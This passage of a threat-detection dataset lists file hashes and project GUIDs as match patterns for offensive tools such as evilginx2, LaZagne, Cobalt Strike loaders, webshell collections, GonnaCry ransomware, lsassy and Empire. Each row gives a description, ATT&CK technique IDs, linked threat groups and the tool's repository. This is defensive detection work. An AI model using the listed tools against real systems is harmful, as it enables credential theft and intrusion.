T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","27234" "*5a2845a19dc310535eec5c74dd770db258e90160ea63e5cc9d97ab87de8081ff*",".{0,1000}5a2845a19dc310535eec5c74dd770db258e90160ea63e5cc9d97ab87de8081ff.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27235" "*5a2b42f395e836e2de823d8a19acf85ebc580b9e6b44270eee5af0ba023b91e2*",".{0,1000}5a2b42f395e836e2de823d8a19acf85ebc580b9e6b44270eee5af0ba023b91e2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27237" "*5a2e947aace9e081ecd2cfa7bc2e485528238555c7eeb6bcca560576d4750a50*",".{0,1000}5a2e947aace9e081ecd2cfa7bc2e485528238555c7eeb6bcca560576d4750a50.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","27238" "*5a3ae8d1bf88a4415c293623ca868e718bf2addbfc88953267bed9c9cf57c2ad*",".{0,1000}5a3ae8d1bf88a4415c293623ca868e718bf2addbfc88953267bed9c9cf57c2ad.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27239" "*5A403F3C-9136-4B67-A94E-02D3BCD3162D*",".{0,1000}5A403F3C\-9136\-4B67\-A94E\-02D3BCD3162D.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","#GUIDproject","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z","27240" "*5a40f11a99d0db4a0b06ab5b95c7da4b1c05b55a99c7c443021bff02c2cf93145c53ff5b*",".{0,1000}5a40f11a99d0db4a0b06ab5b95c7da4b1c05b55a99c7c443021bff02c2cf93145c53ff5b.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with 
golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/zha0gongz1/DesertFox","1","0","#filehash","N/A","10","10","125","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z","27241" "*5a48220efa4415ca4f849a8b483695de2fac0297f61239afeded512944b929e5*",".{0,1000}5a48220efa4415ca4f849a8b483695de2fac0297f61239afeded512944b929e5.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. 
Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","27242" "*5a4dd116f4daaedde86acb94e662e4bd4840fdccad203f9888bdab0390ae6954*",".{0,1000}5a4dd116f4daaedde86acb94e662e4bd4840fdccad203f9888bdab0390ae6954.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","27243" "*5a53c9fc89a0583f7b7edf4e92d910223c0923d8686d2e336361a486d029b0a1*",".{0,1000}5a53c9fc89a0583f7b7edf4e92d910223c0923d8686d2e336361a486d029b0a1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27244" "*5a56d5caa6847d283e27207b727ce27a852b8a567cacd7b29f6073a1458e494e*",".{0,1000}5a56d5caa6847d283e27207b727ce27a852b8a567cacd7b29f6073a1458e494e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27245" "*5a56f8eaba6bff8c910ecc16e1592fd6df370670b71d20038239a58a9d6dc9de*",".{0,1000}5a56f8eaba6bff8c910ecc16e1592fd6df370670b71d20038239a58a9d6dc9de.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27246" "*5a57366f655b5bf5b500769847d1b055d3847065703803d509ff2fa83837ff3a*",".{0,1000}5a57366f655b5bf5b500769847d1b055d3847065703803d509ff2fa83837ff3a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27247" "*5a58a6413acaa3d6bf69b32764e90ff162d2b8173e97376007557b2a23d90eb1*",".{0,1000}5a58a6413acaa3d6bf69b32764e90ff162d2b8173e97376007557b2a23d90eb1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27249" "*5a66c739cbd2e664a77e6dbbdcb318ca7a99e1a98e9314b0a90ea20378cdb9bd*",".{0,1000}5a66c739cbd2e664a77e6dbbdcb318ca7a99e1a98e9314b0a90ea20378cdb9bd.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","#filehash","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","27252" "*5A6F942E-888A-4CE1-A6FB-1AB8AE22AFFA*",".{0,1000}5A6F942E\-888A\-4CE1\-A6FB\-1AB8AE22AFFA.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","0","#GUIDproject","N/A","9","2","159","27","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z","27254" "*5a70e9ca5bcdc934d1451843186cbd70a5869e3d1694a5a81a177fcc5ca37d05*",".{0,1000}5a70e9ca5bcdc934d1451843186cbd70a5869e3d1694a5a81a177fcc5ca37d05.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","27255" "*5a7f1bf78dd911a486125a32312c46ddcf8ea6523498a49c7cbba44c25097028*",".{0,1000}5a7f1bf78dd911a486125a32312c46ddcf8ea6523498a49c7cbba44c25097028.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#filehash","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","27257" "*5a86428ea0c5d6424b44518fe411e2a8c795d201f4a6df3b77b04f2af8f2a911*",".{0,1000}5a86428ea0c5d6424b44518fe411e2a8c795d201f4a6df3b77b04f2af8f2a911.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","27258" "*5a89f9df7621ef8eac8832f7397c55559d71cee04a798474683e7e0019f5ee49*",".{0,1000}5a89f9df7621ef8eac8832f7397c55559d71cee04a798474683e7e0019f5ee49.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27259" "*5a8f375901afcfe1a4152984d4cb6c1d6c0084964fe76b689bd7bdef6a83b959*",".{0,1000}5a8f375901afcfe1a4152984d4cb6c1d6c0084964fe76b689bd7bdef6a83b959.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","27260" "*5a958c89-6327-401c-a214-c89e54855b57*",".{0,1000}5a958c89\-6327\-401c\-a214\-c89e54855b57.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#GUIDproject","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","27262" "*5a9924bf1bd43eaa25685fa21d111909aeab2952b8c7eb67aad1b2ec43b4054c*",".{0,1000}5a9924bf1bd43eaa25685fa21d111909aeab2952b8c7eb67aad1b2ec43b4054c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27263" "*5A9955E4-62B7-419D-AB73-01A6D7DD27FC*",".{0,1000}5A9955E4\-62B7\-419D\-AB73\-01A6D7DD27FC.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","#GUIDproject","N/A","6","5","487","113","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z","27264" "*5a9b8cfd138823a0d9799afc9eb70f28ec2ede90a1db1fde81d8bd70e5613fba*",".{0,1000}5a9b8cfd138823a0d9799afc9eb70f28ec2ede90a1db1fde81d8bd70e5613fba.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","27265" "*5aa96be2191beac9ae36173638b5d98d6ce133676c42438f2c8d86f22c2b2232*",".{0,1000}5aa96be2191beac9ae36173638b5d98d6ce133676c42438f2c8d86f22c2b2232.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - 
APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","27267" "*5aaed5c8657383a894443a92a259182d9dc2c01de72a80460fff4a636e20c65b*",".{0,1000}5aaed5c8657383a894443a92a259182d9dc2c01de72a80460fff4a636e20c65b.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","27268" "*5ab9136f9d920429f7a993e7f0b6d18d27338fd18952695a13a93224f3c680a3*",".{0,1000}5ab9136f9d920429f7a993e7f0b6d18d27338fd18952695a13a93224f3c680a3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27270" "*5abf8e18a6a5c164568a7391b6379c9693cdefb90856ff19204a13d557f896d8*",".{0,1000}5abf8e18a6a5c164568a7391b6379c9693cdefb90856ff19204a13d557f896d8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27272" "*5AC309CE-1223-4FF5-AF84-24BCD0B9E4DC*",".{0,1000}5AC309CE\-1223\-4FF5\-AF84\-24BCD0B9E4DC.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege 
Escalation","https://github.com/crisprss/RasmanPotato","1","0","#GUIDproject","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","27273" "*5ac428505ae4b2a4c7a9b0a03bc948ae7cf0be5c5e7348b9f6303cd2acd8aa36*",".{0,1000}5ac428505ae4b2a4c7a9b0a03bc948ae7cf0be5c5e7348b9f6303cd2acd8aa36.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27274" "*5ac7b2c9c03ec6be6c8e0ea6ffd0b9ca0c69a8f2472d3e183780bfc6f86fc7f6*",".{0,1000}5ac7b2c9c03ec6be6c8e0ea6ffd0b9ca0c69a8f2472d3e183780bfc6f86fc7f6.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","27275" "*5ada70505b8a57566ca4cd20445cb38967d9884316537c26ef81e9ae125b29a6*",".{0,1000}5ada70505b8a57566ca4cd20445cb38967d9884316537c26ef81e9ae125b29a6.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","27278" "*5ae17ceeb8dcfb5eb56fc27876c5047ddfebcb9114beb0a03db81000c46d7054*",".{0,1000}5ae17ceeb8dcfb5eb56fc27876c5047ddfebcb9114beb0a03db81000c46d7054.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27280" "*5ae72041c418f217c872a9935c29da95d0925fc6eca321e92e33bd60ae526b91*",".{0,1000}5ae72041c418f217c872a9935c29da95d0925fc6eca321e92e33bd60ae526b91.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27281" "*5ae9e28dda38df5a339e0f02d4b318e9e6e48a9abe916bb4161a80c7eac0da1f*",".{0,1000}5ae9e28dda38df5a339e0f02d4b318e9e6e48a9abe916bb4161a80c7eac0da1f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27282" "*5aeb6c478edb98ee7903a2a96fe78bf213ceac7ca60ba242dfb7c83d8035aa85*",".{0,1000}5aeb6c478edb98ee7903a2a96fe78bf213ceac7ca60ba242dfb7c83d8035aa85.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","#filehash","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","27283" "*5aee45e43a812457c217265c069ac658d6a2cd5beb44ee73dfb881a73b02c203*",".{0,1000}5aee45e43a812457c217265c069ac658d6a2cd5beb44ee73dfb881a73b02c203.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","27284" 
"*5aef3aec6cf7fd4f2a1b1f82768092cf7c861f3f4efb8d7b1764c51f4620e946*",".{0,1000}5aef3aec6cf7fd4f2a1b1f82768092cf7c861f3f4efb8d7b1764c51f4620e946.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","27286" "*5af1ddffa20fbda387dd0a7454808a98be0a72c6efb977a4330beadb5ed438cd*",".{0,1000}5af1ddffa20fbda387dd0a7454808a98be0a72c6efb977a4330beadb5ed438cd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27287" "*5afab0c6f13f93b77c833816fd067007f9a0770ff0ce5096b55635fa3d9b96b4*",".{0,1000}5afab0c6f13f93b77c833816fd067007f9a0770ff0ce5096b55635fa3d9b96b4.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","0","#filehash","N/A","8","1","0","1","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z","27288" "*5afdada4e30699db8a1903e8a57fb9b50783299b1a8606f145a56e15fa1a9521*",".{0,1000}5afdada4e30699db8a1903e8a57fb9b50783299b1a8606f145a56e15fa1a9521.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","27289" "*5b00508d81b77ecbd0d6c8defc6fc291dd60efa895a1161fdfa168fbb46096df*",".{0,1000}5b00508d81b77ecbd0d6c8defc6fc291dd60efa895a1161fdfa168fbb46096df.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","27292" "*5b020af1ed925fa5f405807ccf366f99a771702ac120da1a7ef11d1b0f6d1981*",".{0,1000}5b020af1ed925fa5f405807ccf366f99a771702ac120da1a7ef11d1b0f6d1981.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27293" 